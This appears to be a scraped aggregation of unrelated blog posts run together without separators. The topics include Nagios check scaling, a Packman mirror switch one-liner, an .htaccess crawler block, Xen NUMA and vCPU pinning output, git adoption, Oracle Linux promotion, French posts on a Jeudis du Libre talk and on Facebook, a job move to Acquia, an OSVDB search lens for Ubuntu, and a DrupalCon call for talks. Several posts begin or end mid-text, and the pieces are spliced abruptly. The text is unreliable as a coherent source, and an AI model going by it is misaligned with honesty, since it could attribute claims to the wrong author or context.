• n = Don't use any delay - schedule all service checks to run immediately (i.e. at the same time!)
• d = Use a "dumb" delay of 1 second between service checks
• s = Use a "smart" delay calculation to spread service checks out evenly (default)
• x.xx = Use a user-supplied inter-check delay of x.xx seconds

Distributing checks

When one host can't cut it anymore, we have to scale eventually. Here are some solutions that live completely in the Nagios world:

• Mod Gearman
• DNX - Distributed Nagios Executor
• OCSP Sweeper - Blogpost

Our future solution would have a similar approach to dispatching the checks command and gathering the results back over queue, but we'd like it to be less dependent on the Nagios solution and be possible to be integrated with other monitoring solutions (Think Unix Toolchain philosophy) A great example idea can be seen in the Velocityconf presentation Asynchronous Real-time Monitoring with Mcollective

Submitting check results back to Nagios

So with distribution we just split our problem again in smaller problems. So let's focus again on the single host running checks problem, after all, the more checks we can run on 1 host, the less we have to distribute.

Nagios Passive Checks easily allow you to uncouple the checks from your main nagios loop and submit the check results later. NSCA (Nagios Service Check Acceptor) is the most used solution for this.

NSCA does have a few limitations:

Opsview writes:

• Only the first 511 bytes of plugin out was returned to the master, limiting the usefulness of the information you could display
• Only the 1st line of data was returned, meaning you had to cramp output together
• NSCA communication used fixed size packets which were inefficient
• While results were sent, Nagios would wait for completion, introducing a bottleneck
• If there was a communication problem with the master, results were dropped

This lead them to using NRD (Nagios Result Distributor)

Ryan Writes:

"What no one tells you when you are deploy NCSA is that it send service checks in series while nagios performs service checks in parallel"

This lead him to writing A highperformance NSCA replacement involving feeding the result direct into the livestatus pipe instead of over the NSCA protocol baked into nagios On a similar note Jelle Smet has created NSCAWEb Easily submit passive host and service checks to Nagios via external commands

We would leverage the Send NSCA Ruby Gem

Why is this relevant to our solution? Without employing some of these optimizations, our bottleneck would shift from running the checks to accepting the check results.

Another solution could be run an NRPE server , and we could probably leverage some ruby logic from Metis - a ruby NRPE server

Conclusion

Even after the following optimizations:

• using head vs get
• large installation tweaks
• tuning the inter_check_delay_method
• parallel NSCA submissions vs serial submissions

we can still optimize with:

• avoid the fork process by running all checks from the same process
• reusing the http connection across multiple requests for the same host (potentially even do http pipelining

In the next blogpost we will show the results of proof of concept code involving ruby/eventmachine/jruby and various httpclient libraries.

Speaking of Packman mirrors... we're in a pretty sorry state regarding that so if you're aware of sites that do mirror Packman but never told us (I'm aware of the one at yandex.ru, have to get it on that mirror list), or if you can get in touch with some mirror sites near you or even on your continent to ask them to mirror Packman, please do.

They can then simply contact us on our mailing-list (that's packman followed by an "at" sign followed by "links2linux" and a dot and "de" -- grrr to spammers) and we'll get back to them with the details for rsync.

The Packman mirror at packman.inode.at is down. We don't know yet what happened nor whether it will be back up soon (or not).

In the mean time, please use another mirror in the mean time.

Here's a quick copy'n'paste one-liner you can put in a shell (konsole, gnome-terminal, xterm, urxvt, ...) as root to switch:

perl -p -i.old -e \
's,^(baseurl=).*(/suse/.+)$,${1}http://ftp.halifax.rwth-aachen.de/packman${2}, if /^baseurl=.*packman\.inode\.at.*/' \
/etc/zypp/repos.d/*packman*.repo

Just got some heavy traffic from a friggin’ spider with this useragent:

Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620

As changing robots.txt did not help immediately, more drastic measures were needed, so I added this tidbit to .htaccess to stop the fuckers:

SetEnvIfNoCase ^User-Agent$ .*(80legs) HTTP_SAFE_BADBOT
Deny from env=HTTP_SAFE_BADBOT

And now back to me just relaxing and having a bath!

Possibly related twitterless twaddle:

• WP DoNotTrack 0.6.0 and beyond
• WP Privacy: Quantcast sneaks back in
• Why your WordPress blog needs DoNotTrack

When buying hardware for a Linux system, often we need to hunt for their support status by searching for PCI or USB IDs in the kernel source, or by looking up the printer model on the linuxprinting.org (now freedesktop.org) openprinting database, or similar things. This is something I'm used to, and not at all unexpected anymore. And after having done it a thousand times for several customers as well as for myself, it's become routine.

So in that light, I was pleasantly surprised last monday when I delivered and installed a Xerox WorkCentre 3220 at a customer last week to see that they support Linux on the same level as they do Windows and MacOS: the "system requirements" part of the manual contains a section laying out the requirements for a computer running Linux, as does the "troubleshooting" section; and when there are Linux-specific bits to be said, there'll just be a Linux-specific section in the manual to tell you what to do. Also, the CD-ROM that came with the device has a Rock Ridge extension, which means that if you pop it into a Linux system you'll see an installer for CUPS and SANE drivers.

The only criticism I have is that it's an installer, and not an LSB package or some such. But hey, for once I didn't have to fight to get a printer to work properly!

The French hacking event is back! This year is a special one, it’s the tenth edition of “La Nuit du Hack” which follows the conference “Hack in Paris“. Yes, as the previous editions, there are three distinguished parts in this major event. Trainings are organized from June 18th to 20th (more info here). Then, two days (June 21st – 22nd) of talks with famous speakers. And finally, an “event into the event“: La Nuit du Hack will be held on June 23rd.

During the last edition, 950 hackers registered to follow more talks and participate to the CTP challenge. This year, a public wargame is also available! Feel free to test the 2011 challenges!

I’ll be present the Thursday and Friday to cover the talks and I’ve also some gifts for you: Like for the previous edition, the organization provided me 10  discount codes (-10%) on “conference only” tickets. The contest is now open! The first ten people who drop me an email (xavier{at}rootshell{dot}be) will receive a discount code… (FIFO!)

At work we mainly use Subversion for version control. For what it does, it works fairly well.

But everyone else has been using git for ages (GitHub is hugely popular, and projects like Drupal have also made the switch). Added to that: the few times I’ve tried branching in SVN, the ensuing merges ruined my day — completely.

So I decided to learn git, for professional work (superior branching/merging) and for personal stuff (working with Drupal and GitHub code, among others).

I started at home, archiving my /home/flo/data/ documents in git and syncing it on multiple computers.

Next, I made the jump in a big way at work: I’m now using git-svn for new projects. So I’m using git, while also still publishing the commits to (remote) SVN.

For using this workflow and still knowing what you’re doing, you need to advance fairly high on the git learning curve:

• adding and committing (obviously)
• branching
• stashing changes
• merging branches
• rebasing branches

So far, so good: working with git-svn is going quite smooth.
It turns out git’s merging is nice, but the interactive rebasing (rewording, reordering and squashing commits) before publication is even nicer.

Online resource I’ve appreciated along the way:

• Hg Init, to un-learn the limitations of Subversion
  • Read it twice if you suffer from CVS, Visual SourceSafe or worse symptoms!
• The Git Parable by Tom Preston-Werner
  • Conceptually explains why it’s a good idea to have full-history commits.
• New artisans’ Git from the Bottom up
  • Explains the hashes, trees and blobs that Git is built on.
  • It’s only a pity that this detailed technical approach is given up halfway through the document, where the usual high-level “let’s-draw-some-trees” approach takes over.
• Some nice rants (not always correct though): Steveko 10 things I have about Git, Reinvigorated programmer Git is a Harrier Jump Jet

So what are some problems with these scenarios?

Well, first of all, even though there is absolutely nothing wrong at all with using community-based and community-maintained distributions (they do a great job), in a commercial setting, or when you build a product that lives on top of it, you need to have the ability to get formal support. Maybe not everyone needs this, but many companies do not have the knowledge (nor should they necessarily) to support the Linux distribution itself and they would want a reasonable formal service level for when something goes wrong, or when to expect something to get released.

Secondly, in the case of using a commercial Linux distribution, there are distribution restrictions and even access restrictions. Certain Linux distribution vendors that offer formal support subscriptions will not give you access to the binaries without a subscription for support services and they also do not let you re-distribute without special agreements or making lots of modifications (or even restrict modifications).

Enter Oracle Linux...

What do you get?

One Enterprise Linux distribution, for all of the above. We make it easy for you. Grab the code, binaries and source, use it, distribute it, build your environments with it, freely, no contracts needed. Need our help, get a support subscription. Choice, open. Virtual, physical, cloud. Not just obfuscated tar balls. No license or activation key, good consistent SLAs for releasing security updates, well tested,... Run Oracle Linux in-house in test and development environments, run it in production environments, use it for customer systems, distribute it, any or all of the above. One distribution that you can manage across all the use cases. No need to manage different versions even if they're similar, no need to make different distribution choices based on your use case and pay/not pay.

http://www.oracle.com/linux
http://public-yum.oracle.com
http://edelivery.oracle.com/linux

May 4th is the International Day Against DRM.

To celebrate, get 50% off all e-books at oreilly.com – today only! Use the code DRMFREE.

Robert Viseur

Ce mercredi 16 mai 2012 à 19h se déroulera la neuvième séance montoise des Jeudis du Libre de Belgique.

Attention, du fait du congé légal de l’ascension le jeudi 17 mai, la séance se déroulera la veille !

Le sujet de cette séance : Créer un moteur de recherche avec des logiciels libres

Thématique : Traitement des données

Public : sysadmin, entreprises, étudiants, Analystes-programmeurs

L’animateur conférencier : Robert Viseur est Docteur en Sciences Appliquées, Assistant dans le service d’Économie et de Management de l’Innovation à la Faculté Polytechnique de l’Université de Mons (UMONS) et Ingénieur de recherche Senior au Centre d’Excellence en Technologie de l’Information et de la Communication (CETIC) à Charleroi. Ses domaines d’expertise sont le management de l’Innovation, le logiciel libre et les technologies d’indexation (moteurs de recherche).

Lieu de cette séance : MUNDANEUM, 76 rue de Nimy à 7000 Mons (cf. ce plan sur le site d’Openstreetmap)

La participation sera gratuite et ne nécessitera que votre inscription nominative, de préférence préalable, ou à l’entrée de la séance. Merci d’indiquer votre intention (même incertaine) en vous inscrivant via la page http://jdl-mons-2012-mai.eventbrite.com/

Cette séance sera suivie d’un verre de l’amitié offert par le Mundaneum.

Si vous êtes intéressé(e) par ce cycle mensuel, n’hésitez pas à consulter l’agenda et à vous inscrire sur la liste de diffusion afin de recevoir systématiquement les annonces, ou à nous contacter à l’adresse jeudisdulibre@loligrub.be

Pour rappel, les Jeudis du Libre se veulent des rencontres autour de thématiques des Logiciels Libres. Les rencontres montoises se déroulent chaque troisième jeudi du mois, et sont organisées dans des locaux et en collaboration avec des Hautes Écoles et Facultés Universitaires du Pôle Hainuyer d’enseignement supérieur impliquées dans les formations d’informaticiens (UMONS, HECFH et Condorcet), et avec le concours de l’A.S.B.L. LoLiGrUB, active dans la promotion des logiciels libres.

Description : Lorsque l’on parle de moteur de recherche, les noms de Google, Bing ou Yahoo! viennent immédiatement à l’esprit. La taille de ces moteurs (plusieurs milliards de pages indexées), l’importance des infrastructures (grands centres de données) et la pertinence des résultats de recherche peuvent donner l’impression que les développements spécifiques sont devenus impossibles ou sans intérêt.

La création de moteurs de recherche spécialisés reste cependant possible, et utile pour certains usages particuliers (ex.: moteurs de recherche d’entreprise, mise en place de systèmes de veille, etc.). Pour ce faire, le développeur peut s’appuyer sur les interfaces de programmation (API) généralement mises à disposition par les moteurs de recherche commerciaux mais aussi sur les très nombreux composants et logiciels libres existants. Ces derniers couvrent la collecte des données textuelles, leur analyse, leur indexation et leur présentation.

La présentation reviendra sur les différentes étapes de création d’un moteur de recherche. Les outils libres disponibles, ainsi que leurs limites et cadres d’utilisation privilégiés, seront ensuite présentés.

My test setup is a dual socket server with 36GB memory. You can see this in Oracle VM Manager as part of the server info or directly on the server with xm info :

# xm info 
..
total_memory           : 36852
free_memory            : 25742
..

I have a few VMs running on this server which is why you see memory be lower than total. The 16GB VM is running with tmem enabled and because of that is not using up all memory but only the base memory needed to be active for the workload it's running.

# xm list
Name                                        ID   Mem VCPUs      State   Time(s)
0004fb00000600001668dac79108cb84             2  4096     4     -b----    129.9
0004fb0000060000804bac06a5087809             1  4096     4     -b----    129.4
0004fb0000060000db9c71d539c940ed             3 16000     4     -b----     28.3
Domain-0                                     0  1244    24     r-----    188.0

Let's start with a clean slate and look at some statistics. The following commands will dump detailed memory information on your server :

# xm debug-key u ; xm dmesg. Basically debug info for NUMA memory info. xm dmesg will show you the debug output.

(XEN) 'u' pressed -> dumping numa info (now-0xFE:A1CFFF69)
(XEN) idx0 -> NODE0 start->0 size->4980736
(XEN) phys_to_nid(0000000000001000) -> 0 should be 0
(XEN) idx1 -> NODE1 start->4980736 size->4718592
(XEN) phys_to_nid(00000004c0001000) -> 1 should be 1
(XEN) CPU0 -> NODE0
(XEN) CPU1 -> NODE0
(XEN) CPU2 -> NODE0
(XEN) CPU3 -> NODE0
(XEN) CPU4 -> NODE0
(XEN) CPU5 -> NODE0
(XEN) CPU6 -> NODE0
(XEN) CPU7 -> NODE0
(XEN) CPU8 -> NODE0
(XEN) CPU9 -> NODE0
(XEN) CPU10 -> NODE0
(XEN) CPU11 -> NODE0
(XEN) CPU12 -> NODE1
(XEN) CPU13 -> NODE1
(XEN) CPU14 -> NODE1
(XEN) CPU15 -> NODE1
(XEN) CPU16 -> NODE1
(XEN) CPU17 -> NODE1
(XEN) CPU18 -> NODE1
(XEN) CPU19 -> NODE1
(XEN) CPU20 -> NODE1
(XEN) CPU21 -> NODE1
(XEN) CPU22 -> NODE1
(XEN) CPU23 -> NODE1
(XEN) Memory location of each domain:
(XEN) Domain 0 (total: 318627):
(XEN)     Node 0: 282976
(XEN)     Node 1: 35651

# xm list
Name                                        ID   Mem VCPUs      State   Time(s)
0004fb0000060000804bac06a5087809             4  4096     4     r-----      8.8
Domain-0                                     0  1244    24     r-----    240.9

# xm debug-key u ; xm dmesg
...
(XEN) Memory location of each domain:
(XEN) Domain 0 (total: 318627):
(XEN)     Node 0: 282976
(XEN)     Node 1: 35651
(XEN) Domain 4 (total: 1048576):
(XEN)     Node 0: 1048576
(XEN)     Node 1: 0

# xm vcpu-list 4
Name                                ID  VCPU   CPU State   Time(s) CPU Affinity
0004fb0000060000804bac06a5087809     4     0     0   -b-       4.8 0-3
0004fb0000060000804bac06a5087809     4     1     3   -b-      26.1 0-3
0004fb0000060000804bac06a5087809     4     2     2   -b-       3.5 0-3
0004fb0000060000804bac06a5087809     4     3     1   -b-       2.4 0-3

# xm vcpu-list 6
Name                                ID  VCPU   CPU State   Time(s) CPU Affinity
0004fb00000600001668dac79108cb84     6     0    19   r--       2.2 19-23
0004fb00000600001668dac79108cb84     6     1    23   r--      24.6 19-23
0004fb00000600001668dac79108cb84     6     2    20   -b-       1.4 19-23
0004fb00000600001668dac79108cb84     6     3    22   -b-       1.1 19-23

# xm debug-key u ; xm dmesg
...
(XEN) Memory location of each domain:
(XEN) Domain 0 (total: 318627):
(XEN)     Node 0: 282976
(XEN)     Node 1: 35651
(XEN) Domain 4 (total: 1048576):
(XEN)     Node 0: 1048576
(XEN)     Node 1: 0
(XEN) Domain 6 (total: 1048576):
(XEN)     Node 0: 0
(XEN)     Node 1: 1048576

After starting a 16Gb VM on this server (domain 7), now that 8Gb is allocated, you will see that this 16Gb VM's memory allocation is across the 2 memory nodes :

(XEN) Memory location of each domain:
(XEN) Domain 0 (total: 318627):
(XEN)     Node 0: 282976
(XEN)     Node 1: 35651
(XEN) Domain 4 (total: 1048576):
(XEN)     Node 0: 1048576
(XEN)     Node 1: 0
(XEN) Domain 6 (total: 1048576):
(XEN)     Node 0: 0
(XEN)     Node 1: 1048576
(XEN) Domain 7 (total: 4097012):
(XEN)     Node 0: 2524148
(XEN)     Node 1: 1572864

... is drawing closer again, and today I've booked my flights. I'll be arriving in the early evening on the 1st, and leaving again on the 15th. The flights will be Brussels->London->Miami->Managua, which unfortunately means I'll have to deal with US border control, but hey.

Also, in order to avoid having to get up at early-o-clock on the morning of the 1st, I'll be flying from Brussels to London on an afternoon flight on the 30th, which means I'll have an evening to spare in London. While I've been there a few times before, it's not a city that I've ever actually visited; my previous three visits were limited to Heathrow, King's Cross (IIRC; could be another train station) and driving through the city on my way from (and to) Steve's barbecue last summer.

If anyone will be there as well that night and would like to meet for beer and/or keysigning, I'd be interested.

Je sais que vous allez être déçu, vous mes fidèles lecteurs de la première heure. Peut-être me maudirez-vous, vouerez-vous mon blog aux gémonies. Mais voilà, il faut que je vous le confesse: malgré mes diatribes anti-Facebook , j'ai fini par re-créer un compte.

Hérésie ! Sacrilège ! J'entends déjà à ma porte les chuchotements de l'inquisition libriste qui vont me mener au bûcher.

Mais est-ce que créer un compte Facebook est compatible avec ma philosophie ? N'y vois-je pas une contradiction avec ma défense du Parti Pirate ?

Pas un problème de philosophie

Oui, Facebook est compatible avec ma philosophie et avec celle du Parti Pirate. D'ailleurs, je suis un adepte de Google+ et, d'un point de vue philosophique, rien ne différencie ce dernier de Facebook.

Facebook, comme le reste, est un moyen de communiquer. C'est donc avant tout un outil très positif. En facilitant la communication, Facebook permet beaucoup de belles choses, des échanges insoupçonnés.

Facebook et Google+ posent cependant deux inquiétudes fondamentales: la centralisation, qui rend les deux sociétés toutes puissantes, et le respect de la vie privée. Ce n'est donc pas l'outil Facebook qui est le problème mais la manière dont la société éditrice gère l'outil.

Une utilisation raisonnée

Ces deux problèmes peuvent être plus ou moins contournés en adaptant son usage du réseau social.

Pour la centralisation, on prendra garde de ne jamais compter uniquement sur ce service et de s'assurer de toujours pouvoir contacter les personnes autrement. De même, on prêtera une attention toute particulière à ne pas exclure les personnes n'étant pas sur un réseau centralisé. Par exemple, je ne garantis pas de répondre aux messages Facebook, utilisez mon adresse mail, vous êtes sûrs d'avoir une réponse.

Quand à la vie privée, comptez que tout ce qui transite par Facebook est public, y compris les messages. Si vous n'aimeriez pas que certaines choses apparaissent sur un écran géant de la place de votre ville, alors n'utilisez pas Facebook ou Google+.

J'ai déjà décrit comment je rendais l'impact de Google minimal sur ma vie privée. Pour Facebook, je pousse le vice encore plus loin: je bloque toute URL venant de Facebook dans mon navigateur principal et j'utilise un navigateur entièrement dédié à Facebook.

Franchement…

Soyons honnête : en créant ce compte, je fais le jeu de ces sociétés. Certains diront que j'encourage même à les utiliser. C'est un peu vrai même si, n'étant pas Georges Clooney, je pense que cette influence est très limitée. Peut-être que, au contraire, ma présence sur Facebook peut donner de la lecture à des gens qui ne soupçonnait pas l'existence du logiciel libre ? J'ose le croire, peut-être pour m'auto-justifier.

Promis : tout ce que je posterai sur Facebook sera disponible ailleurs.

Une envie d'élargir l'horizon

Mais la question que certains se posent sans doute est : pourquoi ce soudain revirement ?

En fait, jusqu'à présent, j'ai toujours été dans mon petit univers libriste. Je postais ce que je voulais. Me lisait et répondait qui était intéressé ou tombait par hasard sur mon blog. Ma rencontre avec des pirates m'a fait reconsidérer la question.

Ma vision de la politique c'est la transparence, c'est le contact entre les personnes afin de bâtir une société pour le plus grand nombre. Il faut être réaliste: en restant sur Diaspora, je me ferme à beaucoup de gens, beaucoup d'opinions différentes. Et ce cloisonnement, qu'il soit virtuel, culturel ou géographique, fait tendre vers la radicalisation.

Ignorer une majorité de personnes sous prétexte qu'elles n'ont pas la compréhension que j'ai de l'informatique ou qu'elles ne suivent tout simplement pas mes choix me semble relever de la plus pédante suffisance. Prétendre construire un projet de société en ignorant ces même personnes est pire encore.

Si je n'ai jamais été un parangon de modestie, je me rends compte que dans un exercice aussi compliqué que de se forger une conscience politique, j'ai besoin de l'aide de tous, j'ai besoin de visions divergentes et pas seulement de l'optique geeko-libriste.

Bref, je suis sur Facebook et vous pouvez vous moquer de moi sur mon wall^[1].

Photos par Fernando Siveira et miss_millions

1) get a summary of your server

The xm info command prints out a whole bunch of information about your system.

Look for the lines below in the output for detail on your systems CPUs.

# xm info
...
nr_cpus                : 8
nr_nodes               : 1
cores_per_socket       : 4
threads_per_core       : 2
cpu_mhz                : 3200
...

# xm info
...
nr_cpus                : 12
nr_nodes               : 1
cores_per_socket       : 6
threads_per_core       : 2
...

2) get the cpu topology

The xenpm command lets you print out the thread/core/socket topology on a given server :

# xenpm get-cpu-topology
CPU     core    socket  node
CPU0     0       0       0
CPU1     0       0       0
CPU2     1       0       0
CPU3     1       0       0

# xenpm get-cpu-topology
CPU     core    socket  node
CPU0     0       0       0
CPU1     0       0       0
CPU2     1       0       0
CPU3     1       0       0
CPU4     2       0       0
CPU5     2       0       0
CPU6     3       0       0
CPU7     3       0       0

# xenpm get-cpu-topology
CPU     core    socket  node
CPU0     0       0       0
CPU1     0       0       0
CPU2     1       0       0
CPU3     1       0       0
CPU4     2       0       0
CPU5     2       0       0
CPU6     8       0       0
CPU7     8       0       0
CPU8     9       0       0
CPU9     9       0       0
CPU10    10      0       0
CPU11    10      0       0

3) Show the guest/VM vcpu bindings to physical threads : Use the command xm vcpu-list to list a summary of which virtual CPU is running on which physical CPU.

# xm vcpu-list 1
Name                                ID  VCPU   CPU State   Time(s) CPU Affinity
0004fb00000600007c351fa24276c63f     1     0     5   -b-    4673.6 5-6
0004fb00000600007c351fa24276c63f     1     1     5   -b-    4534.0 5-6

# xm vcpu-list
Name                                ID  VCPU   CPU State   Time(s) CPU Affinity
0004fb00000600007c351fa24276c63f     1     0     5   -b-    4676.8 5-6
0004fb00000600007c351fa24276c63f     1     1     5   -b-    4537.0 5-6
Domain-0                             0     0     0   -b-     932.1 any cpu
Domain-0                             0     1     6   -b-    1168.0 any cpu
Domain-0                             0     2     7   -b-    1010.8 any cpu
Domain-0                             0     3    11   -b-     903.0 any cpu
Domain-0                             0     4     8   -b-     494.2 any cpu
Domain-0                             0     5     9   r--     773.8 any cpu
Domain-0                             0     6     1   -b-     522.7 any cpu
Domain-0                             0     7     2   -b-     785.1 any cpu
Domain-0                             0     8     4   -b-     473.8 any cpu
Domain-0                             0     9     3   -b-     728.1 any cpu
Domain-0                             0    10    10   -b-     490.8 any cpu
Domain-0                             0    11     0   r--    1219.6 any cpu

4) using ovm_utils ovm_vmcontrol lets a user or admin set and get the cpu/vcpu bindings for a VM through Oracle VM Manager in 3.0.

# ./ovm_vmcontrol -u admin -p Manager1 -h localhost -v apitest -c vcpuget
Oracle VM VM Control utility 0.4.2.
Connected.
Command : vcpuget
Current pinning of virtual CPUs to physical threads : 5,6

Now let's bind the vcpu's to core 0, I just run the following command :

# ./ovm_vmcontrol -u admin -p Manager1 -h localhost -v apitest -c vcpuset  -s 0
Oracle VM VM Control utility 0.4.2.
Connected.
Command : vcpuset
Pinning virtual CPUs
Pinning of virtual CPUs to physical threads  '0' 'apitest' completed.

# xm vcpu-list 1
Name                                ID  VCPU   CPU State   Time(s) CPU Affinity
0004fb00000600007c351fa24276c63f     1     0     0   -b-    4687.6 0
0004fb00000600007c351fa24276c63f     1     1     0   -b-    4547.2 0

After working at Nascom for a very brief time, I will soon start working at Acquia! I’ll be working on the Spark project as a Senior Software Engineer in the Office of the CTO (OCTO), reporting directly to Dries!

Why I left Nascom

I chose Nascom because I felt it was the best fit for me. I really preferred working for a Belgian company. Nascom seemed to have it all¹, but in the end, it was not a good match. I still stand by my choice of Nascom being the best possible choice I could have made, when limiting my choices to Belgian companies. They’re great. But the spark was missing for me.

Having worked at Facebook, I have grown accustomed to a [certain]7 mindset. It’s definitely not that Nascom had a lot of pointless process, it’s that they’re a project company, not a product company. I prefer the challenge of improving “one thing” over working on many projects for which 90% of the problems are alredy solved and the remaining 10% are either glue code or trivial challenges (this is an oversimplification, of course). This of course proves that Drupal core + contrib are doing what they’re supposed to do. We’re eliminating ourselves, as Dries already wrote in 2007:

[…] any business that disintermediates traditional middlemen by taking advantage of the internet has a good chance of being successful. Products or online services that eliminate middlemen can be incredibly successful. It’s a recipe for success.

With that in mind, what can Drupal eliminate?

…

Of course, the funny part is that by doing so, eventually, we’ll eliminate ourselves … But that’s a good thing, as it would free up a ton of spare time. ;-)

Right now, I want to be challenged, to learn as much as I can.

Until my time at Facebook, I’d mostly been hacking on school projects and on (most of the time: relatively complex) Drupal modules for clients. I never built entire Drupal websites due to likely scope creep which would make this work on the side impossible to combine with school projects’ deadlines. Building entire Drupal websites was the obvious next step, so I expected to like that as much as building Drupal modules. That was a miscalculation.

And there you have it. That’s the reason I decided to leave Nascom — after only one week. I felt extremely bad about leaving them so early — it seemed like I hadn’t given them a proper chance yet. But I’d been working on some of their largest projects in my first week already, so I saw the complexity in those projects. Or rather, the lack of complexity. Which is a proof of their solid craftmanship: after all, less complexity implies less risk, which implies a more stable result, more timely delivered to a more satisfied client. That’s the very nature of project companies: limiting complexity and risk to deliver what their clients expect.

I’m the first to admit that quitting after one week is bordering on insanity. But on the other hand: I was certain of my assessment. Staying longer would benefit neither them nor me: what if I quit in the middle of several projects? That would leave them in a bad state and would make it harder for me to look for a new job. So I tried to limit the damage by quitting quickly.

Why I’m starting at Acquia

My main goal for my next job: a technically challenging job, not necessarily involving Drupal, in an environment that operates according to The Hacker Way (i.e. has the “right” culture, more or less a “start-up culture”). Having talked to hordes of Belgian companies before, I firmly believed I had to look beyond Belgium’s borders to find this …² Hopefully I’d find something where I’d be able to work remotely, because moving was still not an option.

A few weeks after I had left Nascom, I was contacted by Acquia again. Our previous talks (in February) had come to an end due to the fact that moving to the U.K. or the U.S. are no options for me. I want to stay in Belgium. This time around however, it turned out to not be a problem, because I would be working directly for Dries, in his Office of the CTO team.

Angie “webchick” Byron explained what project “Phoenix” (now “Spark”) was all about. They deemed me a good match for this particular project (“improving the authoring UX of Drupal”) and checked whether I was interested in it.
Of course I was interested! :) Especially because this is one of the key areas in which Drupal has been somewhat lacking, and for which it is often criticized. I’ve done some UX work myself, with my Hierarchical Select module (also see the live demo), which is the project I spent most of my free time Drupal time on.

Immediately after having talked to webchick, I postponed talks with all other companies. I even risked losing an excellent offer I’d already received.
I made this bet, because this position at Acquia was perfect. It’s about as close as one can get to a dream job. I’d get paid to continue to do what I used to do in all of my available free time until a while ago: help move Drupal forward³ and thus empowering others⁴. I’d love nothing more than Drupal to gradually become better and better⁵. It would be hard work, but work I’m very passionate about. So it was worth the risk.

After some further talks and Acquia reviewing other candidates for a while, I was then offered a position in Acquia’s Office of the CTO! Hurray!
A crucial reason for Acquia to allow me to work remotely is because I worked remotely with Dries in the past: I’ve worked for Mollom, with Dries, in the summers of 2008 and 2009! That went very well and apparently has resulted in sufficient confidence in my capabilities and work ethic to allow me to work remotely.

So, there you have it. I’ll be working for Acquia, a hot U.S. start-up, from Belgium, on Drupal, directly for Dries, with Angie “webchick” Byron, Gábor Hojtsy, Alex “effulgentsia” Bronstein and others (Acquia is still seeking applications to join the Spark team!), on the project I’ve been most passionate about for the past five years: Drupal.

I’m absolutely thrilled!
I will do my very best in helping Drupal to kick more ass!

• life
• Acquia
• Drupal
• Hasselt University
• Nascom

• Add new comment

Recently I upgraded my laptop with the latest Ubuntu release (12.04-LTS). For a few releases, Ubuntu switched from Gnome to Unity and I’m happy to use it since the 11.04 version! I know that this choice has caused a lot of debates between the aficionados of both GUI but it always worked fine for me. Of course, no interface is perfect but it does its job. I just like the way it presents applications and files. Most are accessible with a few key presses. After the upgrade, I made the new proprietary tour and decided to look deeper into the Unity “Dash” feature. This is the main feature of Unity. It allows you to quickly search for information on your local filesystems (applications, files, bookmarks, …) or on the Internet (Wikipedia). To achieve this, the “Dash” uses “Lenses“. And those use “Scopes” that are small scripts which perform the search requests. “Lenses” are based on (briefly resumed):

• A .lens file to let Unity load it
• A daemon with a well-known name on D-Bus
• A D-Bus .service file to let Unity activate the Lens

When Unity is started, it parses the configuration files and spawns the small daemons responsible for the searches. On a stock Ubuntu, you can see the following daemons running:

$ ps ax|grep lens
 2741 ?        Sl     0:05 /usr/lib/unity-lens-applications/unity-applications-daemon
 2743 ?        Sl     0:04 /usr/lib/unity-lens-files/unity-files-daemon
 2745 ?        Sl     0:00 /usr/lib/unity-lens-music/unity-music-daemon
 2747 ?        Sl     0:01 /usr/bin/python /usr/lib/unity-lens-video/unity-lens-video
 2777 ?        Sl     0:00 /usr/lib/unity-lens-music/unity-musicstore-daemon

If you’re interested in learning more about Lenses, there is a good documentation available here. Some people started to write their own Lenses to search for useful online data. Some popular ones are:

• Wikipedia
• Google Contacts
• Youtube
• Torrents
• Flickr

Basically, any website that proposes a search feature can be integrated into Unity as well as any online service! (ex: whois) The daemon needs to send the query based on the provided keywords and format the results into something usable by Unity (via D-Bus).

I decided to learn how to build my own Lens. Why not create one with more focus on information security? What can be interesting to search for if you’re an infosec guy? Vulnerabilities of course! Let’s imagine, you are performing a pentest and you find a unpatched Solaris box running an Apache server. It could be nice to search for vulnerabilities affecting those solutions. That’s the purpose of my Lens: searching the OSVDB database for vulnerabilities.

Type some terms (or dates) and relevant OSVDB entries will be displayed directly in Unity. Click on them to open a browser to the direct page!

(Click to enlarge)

By default (empty search), the latest vulnerabilities are displayed (sorted by time). You can also search for a specific period by specifying a month and a year (ex: “Apr 2012“). The full-text search feature of OSVDB is used (ex: “Cisco IOS 12.1“). There is nothing fancy, most of the code is based on another publicly available Lens. It was first of all a good opportunity for me to write my first piece of code in Python!

Source files are available on github.com. A Debian package (.deb) is ready to be installed. A logout is required to restart Unity and makes it recognize the new Lens. Once installed click on the little “OSVDB” icon on the bottom of your Dash to search for vulnerabilities. Feel free to use it, patch it or submit your comments! Enjoy!

A couple of days ago a neighbor asked if I could have a look at his slightly misbehaving PC; links in emails did not open correctly. He was on an all Microsoft setup, with Windows Seven, IE9 and Outlook. The error was as harsh as it was vague;

According to “wonderfully wise web” that problem is typically caused by a lack of a default browser in Windows 7, but given the fact that IE9 was the only browser installed, that did not make a lot of sense.

I was pretty confused, checking and re-applying settings while searching the web, but then I found a forum thread in which someone replied that the 64-bits version of IE9 just cannot be set as default browser, ever. Must be that Windows 7 does not really like 64-bits IE9? I did not find an easy way to switch to 32-bits IE9 and as the neighbor did not object, so I installed the most recent stable version of Firefox on his PC and set that as default browser and all was well. IE9 might not be a bad browser, but sometimes even Windows 7 wants you to install an alternative and who are we to disagree?

Possibly related twitterless twaddle:

• Making do with Windows Phone, loving Metro
• Mobile browsers: Opera Mobile 12 shines in html5test
• deredactie.be: “browser is zoekmachine”

Devopsdays Mountainview sold out in a short 3 hours .. but there's other events that will breath devops this summer.
DrupalCon in Munich will be one of them ..

Some of you might have noticed that I`m cochairing the devops track for DrupalCon Munich,
The CFP is open till the 11th of this month and we are still actively looking for speakers.

We're trying to bridge the gap between drupal developers and the people that put their code to production, at scale.
But also enhancing the knowledge of infrastructure components Drupal developers depend on.

We're looking for talks both on culture (both success stories and failure) , automation,
specifically looking for people talking about drupal deployments , eg using tools like Capistrano, Chef, Puppet,
We want to hear where Continuous Integration fits in your deployment , do you do Continuous Delivery of a drupal environment.
And how do you test ... yes we like to hear a lot about testing , performance tests, security tests, application tests and so on.
... Or have you solved the content vs code vs config deployment problem yet ?

How are you measuring and monitoring these deployments and adding metrics to them so you can get good visibility on both
system and user actions of your platform. Have you build fancy dashboards showing your whole organisation the current state of your deployment ?

We're also looking for people talking about introducing different data backends, nosql, scaling different search backends , building your own cdn using smart filesystem setups.
Or making smart use of existing backends, such as tuning and scaling MySQL, memcached and others.

So lets make it clear to the community that drupal people do care about their code after they committed it in source control !

Please submit your talks here

